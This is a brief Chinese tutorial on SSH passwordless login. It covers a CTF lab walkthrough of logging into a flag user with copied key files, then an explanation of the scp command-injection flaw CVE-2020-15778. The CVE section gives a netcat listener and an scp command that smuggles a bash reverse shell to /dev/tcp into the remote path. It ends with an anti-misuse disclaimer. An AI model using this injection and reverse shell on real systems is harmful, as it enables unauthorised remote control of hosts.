ssh免密登录于linux系统上用于渗透的使用及其漏洞
免密登录使用教程
渗透实验
通过操作机终端使用ssh登录靶机的test用户(密码123),test用户目录中存放了可用于ssh免密码登录靶机的flag用户所必要的文件,使用这些文件登录靶机的flag用户,flag存在于flag用户目录中。
首先解析题目并登录靶机,由于题目坑爹,其实所需文件在flag目录下,所以我们把它复制到自己的目录下
我们发现其内是一个压缩包,在/home/test/.ssh/
路径下解压它,得到免密登录所需的文件,然后直接ssh免密登录flag@localhost用户得到flag
CVE漏洞CVE-2020-15778
源博文
首先对目标任意端口打开侦听,这里随便选择一个4444端口nc -lvvp 4444
使用ssh免密登录利用scp进行shell命令注入
scp test.txt username@x.x.x.x:'`bash -i >& /dev/tcp/x.x.x.x/4444 0>&1` /tmp/test.txt'
其中x.x.x.x
为目标ip,发送文件与接收文件目录都不重要,重要的是中间的bash指令bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
可以创建并返回一个交互式shell
如图我们在nc监听处得到了一个交互shell
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。